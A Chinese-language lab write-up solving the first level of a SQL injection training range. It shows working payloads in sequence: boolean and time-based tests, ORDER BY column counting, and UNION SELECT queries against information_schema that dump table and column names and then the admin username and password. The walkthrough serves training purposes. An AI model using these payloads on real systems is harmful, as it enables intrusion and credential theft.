2. 程式人生 > 實用技巧 >封神臺靶場:第一章:為了女神小芳!【配套課時:SQL注入攻擊原理 實戰演練】

封神臺靶場:第一章:為了女神小芳!【配套課時:SQL注入攻擊原理 實戰演練】

阿新 發佈:2020-11-14

靶場直鏈

http://59.63.200.79:8003/
請求方式    GET  
閉合方式    未知
注入方式    聯合,布林,延時
注入程式碼  id=1 and 1=1

從下圖可以看出,這裡可能存在注入點。

進行注入點測試

?id=1 and 1=1 #  頁面正常顯示
?id=1 and 1=2 #  頁面顯示不正常
?id=1 and sleep(5) #  頁面存在明顯延遲

我們採用簡單方便的聯合注入

用order by X對欄位數進行測試,通過修改X的數量檢視頁面返回是否正常。
經測試,欄位數為2
?id=1111 order by 2

我們採用聯合查詢union select判斷資料輸出時的顯示位置。
?id=-1 union  select 111,222

上面的語句,理論上可以,但在這裡好像出了點問題,估計對id值做了一個簡單的處理
我們採用寧外的構造語句
?id=1 and 1=2 union select 111,222

我們直接爆出當前資料庫maoshe

?id=1 and 1=2 union select 111,database()

爆表名

?id=1 and 1=2 union select 111,(select group_concat(table_name,"~") from information_schema.tables where table_schema='maoshe' )

爆欄位名

?id=1 and 1=2 union select 111,(select group_concat(column_name,"~") from information_schema.columns where table_schema='maoshe' and table_name='admin' )

爆出資料

利用獲得庫名、表名、欄位名爆出資料
?id=1 and 1=2 union select 111,(select group_concat(id,'~',username,'~',password,'~') from maoshe.admin)

賬號  admin
密碼  hellohack

相關推薦

神臺靶場第一為了女神配套課時SQL注入攻擊原理 實戰演練

靶場直鏈 http://59.63.200.79:8003/ 請求方式GET   閉合方式未知 注入方式聯合,布林,延時

第一為了女神

第一為了女神(新人能看懂的思路) 當我剛學完sql注入,感覺自己的任督二脈好像被打通了,想要和高手過兩招,但是奈何pikachu已經滿足不了我

神臺靶場第七GET THE PASS 技能點程序中抓下管理員明文密碼

拿到SYSTEM之後,尤里並不滿足,他準備通過某種方式拿到伺服器管理員密碼,用來收集密碼資訊,以便其他方向的滲透,順便想將密碼發給小芳,用以炫技。卻不曾想,當尤里看到系統的明文密碼後。。大吃一驚。。。自此,

神臺靶場萌新也能找CMS突破

靶場地址 http://59.63.200.79:8003/bluecms/uploads/ 百度查詢了bluecms的相關漏洞 發現存在sql注入,且sql注入點在如下網頁

Java基礎第一、基礎語法

第一章、基礎語法 1、註釋、識別符號、關鍵字 註釋 平時我們編寫程式碼,當代碼量還比較少的時候,我們會很容易讀懂我們寫的程式碼,但是當專案結構一旦複雜起來,讀起來就不那麼容易了,這時就需要一個類似筆記的東

FreeRTOS筆記篇第一 描述

FREERTOSY一級目錄解釋 下載的版本為10.4.1包含一個原始碼+程式碼案例 程式碼結構

如何使用sqlmap破解神臺靶場第一

文章目錄 一.檢視是否有注入 使用命令 mysql.py -u http://59.63.200.79:8003/?id=1 --batch -u指令為檢視網址的url是否有漏洞。-batch為永遠不要求使用者輸入資訊,預設執行。

《夏洛克·福爾摩斯第一》宣傳片公佈 有多重結局

今日(1月22日),Frogwares新作《夏洛克·福爾摩斯第一》正式公佈遊戲介紹宣傳片,該作預計將於2021年發售,登陸PS5、Xbox Series X、PS4、Xbox One和PC(Steam、Epic Games Store、GOG)平臺。

《夏洛克·福爾摩斯第一》首個實機演示放出

IGN剛剛釋出了《夏洛克·福爾摩斯第一》的首個實機演示視訊,本作將於2021年發售,登陸PS5、Xbox Series X、PS4、Xbox

《夏洛克·福爾摩斯第一》10分鐘實機演示 具有吸引力

外媒IGN為玩家帶來了《夏洛克・福爾摩斯 第一章》10分鐘實機試玩,通過演示,我們可以瞭解到遊戲的一些基本操作,玩家將在以故事為導向的驚悚偵探故事中,隨著年輕的夏洛克・福爾摩斯將在充滿異國情調的危險小島上證

《夏洛克·福爾摩斯第一》實機截圖展示

Frogwares日前為《夏洛克·福爾摩斯第一》(Sherlock Holmes: Chapter One)公佈了全新實機截圖。遊戲使用虛幻4引擎製作。

《夏洛克・福爾摩斯第一》新預告支援多平臺,年內釋出

6 月 12 日訊息今年的 E3 遊戲展即將於 6 月 13 日凌晨正式召開,屆時會有多款 3D 遊戲大作正式釋出。開放世界偵探遊戲《夏洛克・福爾摩斯:第一章》今日釋出了新版預告片,展現了部分遊戲場景。

《福爾摩斯第一》7分鐘新演示 城內探索和偽裝

GamSpot釋出了《福爾摩斯第一》獨家新演示視訊,長達7分鐘,展示了在城內的探索和偽裝玩法。

《夏洛克·福爾摩斯第一》全新截圖曝光

Frogwares在Epic商城釋出了《夏洛克·福爾摩斯第一》的全新截圖,本作將於今年冬季發售,登陸Xbox Series

Python|PTA浙大版《Python 程式設計》題目集第一

前言 Hello小夥伴 非常感謝您閱讀海轟的文章,倘若文中有錯誤的地方,歡迎您指出~

《夏洛克·福爾摩斯第一》發售日洩露11月16日

今日(9月14日),據Xbox官方商城顯示的訊息,偵探動作解謎類遊戲《夏洛克·福爾摩斯:第一章》將於2021年11月16日發售,目前Xbox官方商城(香港、美國)的《夏洛克·福爾摩斯:第一章》均顯示了此發售日期。

《夏洛克·福爾摩斯第一》舊主機版跳票

《夏洛克·福爾摩斯第一》開發商Frogwares近日釋出公告,宣佈《夏洛克·福爾摩斯第一》上世代版本(Xbox

《夏洛克·福爾摩斯第一》發行日敲定 新實機分享

《夏洛克·福爾摩斯第一》將於11月16日面向PlayStation 5、Xbox Series和PC(通過Steam、Epic

《福爾摩斯第一》預購開啟,可額外獲得套裝及《福爾摩斯罪與罰》

由Frogwares發行的開放世界冒險推理RPG《福爾摩斯:第一章》將於11月16日發售,今日在Steam,GOG,EPIC和微軟商店開啟預購,官方同步公開了一段新的預告片。遊戲將登陸PC、PS5、PS4、Xbox平臺,支援簡體中文。

《福爾摩斯第一》開發商承諾絕不存在加班情況

在遊戲業界中,加班一直是個熱門話題,而且在一些大作比如《賽博朋克2077》上面的討論熱度更高。像《腦航員2》、《瑞奇與叮噹分離》這些遊戲就明確表示過在開發中沒有加班問題。現在Frogwares的《福爾摩斯:第一章